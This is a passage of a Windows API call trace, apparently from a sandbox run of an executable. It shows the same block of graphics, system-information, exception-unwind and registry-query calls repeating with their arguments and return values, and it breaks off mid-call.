[0088.258] DeleteObject (ho=0x1101118) returned 1 [0088.258] DeleteObject (ho=0x630401d3) returned 1 [0088.258] DeleteObject (ho=0x610401d6) returned 1 [0088.258] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.258] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.258] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.258] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.258] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.258] BeginPath (hdc=0x0) returned 0 [0088.258] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.258] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.258] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.258] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.258] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.258] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.258] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.259] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.259] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x640401d3 [0088.259] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x620401d6 [0088.259] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041119 [0088.259] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104111a [0088.259] CombineRgn (hrgnDst=0x1041119, hrgnSrc1=0x640401d3, hrgnSrc2=0x620401d6, iMode=1) returned 1 [0088.259] CombineRgn (hrgnDst=0x104111a, hrgnSrc1=0x640401d3, hrgnSrc2=0x620401d6, iMode=4) returned 2 [0088.259] CreateSolidBrush (color=0xff) returned 0x2101118 [0088.259] CreateSolidBrush (color=0xff0000) returned 0x110111b [0088.259] DeleteObject (ho=0x110111b) returned 1 [0088.259] DeleteObject (ho=0x620401d6) returned 1 [0088.259] DeleteObject (ho=0x640401d3) returned 1 [0088.259] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.259] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.259] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.259] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.259] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.259] BeginPath (hdc=0x0) returned 0 [0088.259] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.259] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.259] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.259] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.259] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.259] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.259] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.259] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.259] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x630401d6 [0088.260] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x650401d3 [0088.260] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104111c [0088.260] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104111d [0088.260] CombineRgn (hrgnDst=0x104111c, hrgnSrc1=0x630401d6, hrgnSrc2=0x650401d3, iMode=1) returned 1 [0088.260] CombineRgn (hrgnDst=0x104111d, hrgnSrc1=0x630401d6, hrgnSrc2=0x650401d3, iMode=4) returned 2 [0088.260] CreateSolidBrush (color=0xff) returned 0x210111b [0088.260] CreateSolidBrush (color=0xff0000) returned 0x110111e [0088.260] DeleteObject (ho=0x110111e) returned 1 [0088.260] DeleteObject (ho=0x650401d3) returned 1 [0088.260] DeleteObject (ho=0x630401d6) returned 1 [0088.260] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.260] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.260] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.260] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.260] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.260] BeginPath (hdc=0x0) returned 0 [0088.260] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.260] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.260] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.260] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.260] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.260] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.260] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.260] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.260] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x660401d3 [0088.260] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x640401d6 [0088.260] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104111f [0088.260] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041120 [0088.260] CombineRgn (hrgnDst=0x104111f, hrgnSrc1=0x660401d3, hrgnSrc2=0x640401d6, iMode=1) returned 1 [0088.260] CombineRgn (hrgnDst=0x1041120, hrgnSrc1=0x660401d3, hrgnSrc2=0x640401d6, iMode=4) returned 2 [0088.260] CreateSolidBrush (color=0xff) returned 0x210111e [0088.260] CreateSolidBrush (color=0xff0000) returned 0x1101121 [0088.261] DeleteObject (ho=0x1101121) returned 1 [0088.261] DeleteObject (ho=0x640401d6) returned 1 [0088.261] DeleteObject (ho=0x660401d3) returned 1 [0088.261] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.261] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.261] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.261] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.261] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.261] BeginPath (hdc=0x0) returned 0 [0088.261] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.261] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.261] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.261] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.261] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.261] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.261] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.261] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.261] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x650401d6 [0088.261] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x670401d3 [0088.261] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041122 [0088.262] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041123 [0088.262] CombineRgn (hrgnDst=0x1041122, hrgnSrc1=0x650401d6, hrgnSrc2=0x670401d3, iMode=1) returned 1 [0088.262] CombineRgn (hrgnDst=0x1041123, hrgnSrc1=0x650401d6, hrgnSrc2=0x670401d3, iMode=4) returned 2 [0088.262] CreateSolidBrush (color=0xff) returned 0x2101121 [0088.262] CreateSolidBrush (color=0xff0000) returned 0x1101124 [0088.262] DeleteObject (ho=0x1101124) returned 1 [0088.262] DeleteObject (ho=0x670401d3) returned 1 [0088.262] DeleteObject (ho=0x650401d6) returned 1 [0088.262] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.262] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.262] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.262] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.262] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.262] BeginPath (hdc=0x0) returned 0 [0088.262] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.262] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.262] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.262] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.262] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.262] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.262] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.262] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.262] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x680401d3 [0088.262] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x660401d6 [0088.262] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041125 [0088.262] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041126 [0088.262] CombineRgn (hrgnDst=0x1041125, hrgnSrc1=0x680401d3, hrgnSrc2=0x660401d6, iMode=1) returned 1 [0088.262] CombineRgn (hrgnDst=0x1041126, hrgnSrc1=0x680401d3, hrgnSrc2=0x660401d6, iMode=4) returned 2 [0088.262] CreateSolidBrush (color=0xff) returned 0x2101124 [0088.262] CreateSolidBrush (color=0xff0000) returned 0x1101127 [0088.263] DeleteObject (ho=0x1101127) returned 1 [0088.263] DeleteObject (ho=0x660401d6) returned 1 [0088.263] DeleteObject (ho=0x680401d3) returned 1 [0088.263] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.263] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.263] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.263] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.263] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.263] BeginPath (hdc=0x0) returned 0 [0088.263] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.263] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.263] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.263] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.263] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.263] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.263] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.263] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.263] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x670401d6 [0088.263] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x690401d3 [0088.263] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041128 [0088.263] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1041129 [0088.263] CombineRgn (hrgnDst=0x1041128, hrgnSrc1=0x670401d6, hrgnSrc2=0x690401d3, iMode=1) returned 1 [0088.263] CombineRgn (hrgnDst=0x1041129, hrgnSrc1=0x670401d6, hrgnSrc2=0x690401d3, iMode=4) returned 2 [0088.263] CreateSolidBrush (color=0xff) returned 0x2101127 [0088.263] CreateSolidBrush (color=0xff0000) returned 0x110112a [0088.263] DeleteObject (ho=0x110112a) returned 1 [0088.263] DeleteObject (ho=0x690401d3) returned 1 [0088.263] DeleteObject (ho=0x670401d6) returned 1 [0088.263] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.263] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.264] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.264] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.264] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.264] BeginPath (hdc=0x0) returned 0 [0088.264] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.264] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.264] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.264] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.264] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.264] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.264] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.264] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.264] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6a0401d3 [0088.264] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x680401d6 [0088.264] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104112b [0088.264] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104112c [0088.264] CombineRgn (hrgnDst=0x104112b, hrgnSrc1=0x6a0401d3, hrgnSrc2=0x680401d6, iMode=1) returned 1 [0088.264] CombineRgn (hrgnDst=0x104112c, hrgnSrc1=0x6a0401d3, hrgnSrc2=0x680401d6, iMode=4) returned 2 [0088.264] CreateSolidBrush (color=0xff) returned 0x210112a [0088.264] CreateSolidBrush (color=0xff0000) returned 0x110112d [0088.264] DeleteObject (ho=0x110112d) returned 1 [0088.264] DeleteObject (ho=0x680401d6) returned 1 [0088.264] DeleteObject (ho=0x6a0401d3) returned 1 [0088.264] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.264] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.264] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.264] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.264] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.264] BeginPath (hdc=0x0) returned 0 [0088.264] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.264] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.264] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.264] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.264] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.265] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.265] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.265] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.310] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x690401d6 [0088.310] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6b0401d3 [0088.310] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414c4 [0088.310] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414c5 [0088.310] CombineRgn (hrgnDst=0x10414c4, hrgnSrc1=0x690401d6, hrgnSrc2=0x6b0401d3, iMode=1) returned 1 [0088.310] CombineRgn (hrgnDst=0x10414c5, hrgnSrc1=0x690401d6, hrgnSrc2=0x6b0401d3, iMode=4) returned 2 [0088.310] CreateSolidBrush (color=0xff) returned 0x210112d [0088.310] CreateSolidBrush (color=0xff0000) returned 0x11014c6 [0088.310] DeleteObject (ho=0x11014c6) returned 1 [0088.310] DeleteObject (ho=0x6b0401d3) returned 1 [0088.310] DeleteObject (ho=0x690401d6) returned 1 [0088.310] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.310] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.310] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.310] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.310] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0088.310] BeginPath (hdc=0x0) returned 0 [0088.310] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0088.310] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0088.310] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.310] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0088.310] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0088.310] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0088.310] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0088.311] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0088.311] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x6c0401d3 [0088.311] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x6a0401d6 [0088.311] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414c7 [0088.311] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x10414c8 [0088.311] CombineRgn (hrgnDst=0x10414c7, hrgnSrc1=0x6c0401d3, hrgnSrc2=0x6a0401d6, iMode=1) returned 1 [0088.311] CombineRgn (hrgnDst=0x10414c8, hrgnSrc1=0x6c0401d3, hrgnSrc2=0x6a0401d6, iMode=4) returned 2 [0088.311] CreateSolidBrush (color=0xff) returned 0x21014c6 [0088.311] CreateSolidBrush (color=0xff0000) returned 0x11014c9 [0088.311] DeleteObject (ho=0x11014c9) returned 1 [0088.311] DeleteObject (ho=0x6a0401d6) returned 1 [0088.311] DeleteObject (ho=0x6c0401d3) returned 1 [0088.311] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0088.311] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0088.311] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0088.311] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0088.311] SetDCPenColor 